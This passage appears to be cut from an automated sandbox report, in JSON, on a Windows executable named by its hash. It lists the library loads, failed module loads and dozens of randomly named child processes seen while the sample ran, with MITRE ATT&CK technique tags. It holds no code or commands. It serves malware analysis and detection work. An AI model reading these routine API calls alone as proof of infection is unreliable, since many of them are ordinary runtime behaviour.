\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005920)\n \"dhxhp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005988)\n \"dhxhp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005988)\n \"dhxhp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005988)\n \"dhxhp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005988)\n \"lnvjpll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005940)\n \"lnvjpll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005940)\n \"lnvjpll.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005940)\n \"lnvjpll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005940)\n \"0228060.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004128)\n \"0228060.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004128)\n \"0228060.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004128)\n \"0228060.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004128)\n \"4404242.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006140)\n \"4404242.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006140)\n \"4404242.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006140)\n \"4404242.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006140)\n \"nrdphjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004324)\n \"nrdphjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004324)\n \"nrdphjv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004324)\n \"nrdphjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004324)\n \"rpbpdxh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004168)\n \"rpbpdxh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004168)\n \"rpbpdxh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004168)\n \"rpbpdxh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004168)\n \"rpbpdxh.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00004168)\n \"rpbpdxh.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004168)\n \"rpbpdxh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004168)\n \"408802.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002508)\n \"408802.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002508)\n \"408802.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002508)\n \"408802.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002508)\n \"848862.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004200)\n \"848862.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004200)\n \"848862.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004200)\n \"848862.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004200)\n \"22202.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004260)\n \"22202.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004260)\n \"22202.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004260)\n \"22202.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004260)\n \"lvlfrln.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004192)\n \"lvlfrln.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004192)\n \"lvlfrln.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004192)\n \"lvlfrln.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004192)\n \"6248060.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004348)\n \"6248060.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004348)\n \"6248060.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004348)\n \"6248060.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004348)\n \"086880.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002780)\n \"086880.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002780)\n \"086880.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002780)\n \"086880.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002780)\n \"4424228.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003840)\n \"4424228.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003840)\n \"4424228.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003840)\n \"66206.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004236)\n \"66206.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004236)\n \"66206.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004236)\n \"66206.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004236)\n \"0488840.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002820)\n \"0488840.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002820)\n \"0488840.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002820)\n \"0488840.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002820)\n \"bnrrj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004304)\n \"bnrrj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004304)\n \"bnrrj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004304)\n \"bnrrj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004304)\n \"288226.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002228)\n \"288226.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002228)\n \"288226.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002228)\n \"288226.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002228)\n \"08246.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002868)\n \"08246.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002868)\n \"08246.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002868)\n \"08246.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002868)\n \"dhfjp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003712)\n \"dhfjp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003712)\n \"dhfjp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003712)\n \"dhfjp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003712)\n \"dhfjp.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003712)\n \"dhfjp.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003712)\n \"dhfjp.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003712)\n \"dvlplh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003888)\n \"dvlplh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003888)\n \"dvlplh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003888)\n \"dvlplh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003888)\n \"206020.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001952)\n \"206020.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001952)\n \"206020.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001952)\n \"206020.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001952)\n \"8204220.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003224)\n \"8204220.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003224)\n \"8204220.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003224)\n \"8204220.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003224)\n \"04620.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004048)\n \"04620.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004048)\n \"04620.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004048)\n \"04620.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004048)\n \"bjjnnr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004524)\n \"bjjnnr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004524)\n \"bjjnnr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004524)\n \"bjjnnr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004524)\n \"tfvnr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000984)\n \"tfvnr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000984)\n \"tfvnr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000984)\n \"tfvnr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000984)\n \"xjjln.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003248)\n \"xjjln.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003248)\n \"xjjln.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003248)\n \"xjjln.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003248)\n \"ffpprbb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000900)\n \"ffpprbb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000900)\n \"ffpprbb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000900)\n \"ffpprbb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000900)\n \"xrfrdxf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001440)\n \"xrfrdxf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001440)\n \"xrfrdxf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001440)\n \"xrfrdxf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001440)\n \"xrfrdxf.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00001440)\n \"xrfrdxf.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00001440)\n \"xrfrdxf.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00001440)\n \"xrfrdxf.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00001440)\n \"ptfff.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004536)\n \"ptfff.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004536)\n \"ptfff.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004536)\n \"ptfff.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004536)\n \"ttnbl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002652)\n \"ttnbl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002652)\n \"ttnbl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002652)\n \"ttnbl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002652)\n \"664222.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003580)\n \"664222.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003580)\n \"664222.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003580)\n \"664222.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003580)\n \"8024206.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004212)\n \"8024206.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004212)\n \"8024206.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004212)\n \"8024206.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004212)\n \"4602048.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001728)\n \"4602048.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001728)\n \"4602048.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001728)\n \"4602048.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001728)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dhxhp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dhxhp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lnvjpll.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lnvjpll.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0228060.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0228060.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4404242.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4404242.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nrdphjv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nrdphjv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rpbpdxh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rpbpdxh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"408802.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"408802.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"848862.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"848862.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"22202.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"22202.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lvlfrln.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lvlfrln.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6248060.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6248060.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"086880.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"086880.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"66206.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"66206.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0488840.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0488840.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"bnrrj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bnrrj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"288226.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"288226.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"08246.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"08246.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dhfjp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dhfjp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dvlplh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dvlplh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"206020.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"206020.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8204220.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8204220.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"04620.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"04620.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"bjjnnr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bjjnnr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tfvnr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tfvnr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xjjln.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xjjln.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ffpprbb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ffpprbb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xrfrdxf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xrfrdxf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ptfff.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ptfff.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ttnbl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ttnbl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"664222.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"664222.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8024206.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8024206.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4602048.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4602048.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"dhxhp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"lnvjpll.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"0020002.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"802862.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"824686.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"0228060.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"4404242.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"dvrdf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"nrdphjv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"rpbpdxh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"408802.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"6644862.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"848862.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"22202.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"lvlfrln.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"vrdnrx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"6248060.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"062080.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"086880.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"4424228.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"42866.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"600468.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"66206.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000\n \"280282.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 763C0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"dhxhp.exe\" (UID: 00000000-00005988)\n Spawned process \"lnvjpll.exe\" (UID: 00000000-00005940)\n Spawned process \"0020002.exe\" (UID: 00000000-00005896)\n Spawned process \"802862.exe\" (UID: 00000000-00004124)\n Spawned process \"824686.exe\" (UID: 00000000-00004400)\n Spawned process \"0228060.exe\" (UID: 00000000-00004128)\n Spawned process \"4404242.exe\" (UID: 00000000-00006140)\n Spawned process \"dvrdf.exe\" (UID: 00000000-00004308)\n Spawned process \"nrdphjv.exe\" (UID: 00000000-00004324)\n Spawned process \"rpbpdxh.exe\" (UID: 00000000-00004168)\n Spawned process \"408802.exe\" (UID: 00000000-00002508)\n Spawned process \"6644862.exe\" (UID: 00000000-00003396)\n Spawned process \"848862.exe\" (UID: 00000000-00004200)\n Spawned process \"22202.exe\" (UID: 00000000-00004260)\n Spawned process \"lvlfrln.exe\" (UID: 00000000-00004192)\n Spawned process \"vrdnrx.exe\" (UID: 00000000-00003912)\n Spawned process \"6248060.exe\" (UID: 00000000-00004348)\n Spawned process \"062080.exe\" (UID: 00000000-00002560)\n Spawned process \"086880.exe\" (UID: 00000000-00002780)\n Spawned process \"4424228.exe\" (UID: 00000000-00003840)\n Spawned process \"42866.exe\" (UID: 00000000-00003768)\n Spawned process \"600468.exe\" (UID: 00000000-00002532)\n Spawned process \"66206.exe\" (UID: 00000000-00004236)\n Spawned process \"280282.exe\" (UID: 00000000-00004496)\n Spawned process \"0488840.exe\" (UID: 00000000-00002820)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f40576@RPCRT4.dll\"\n 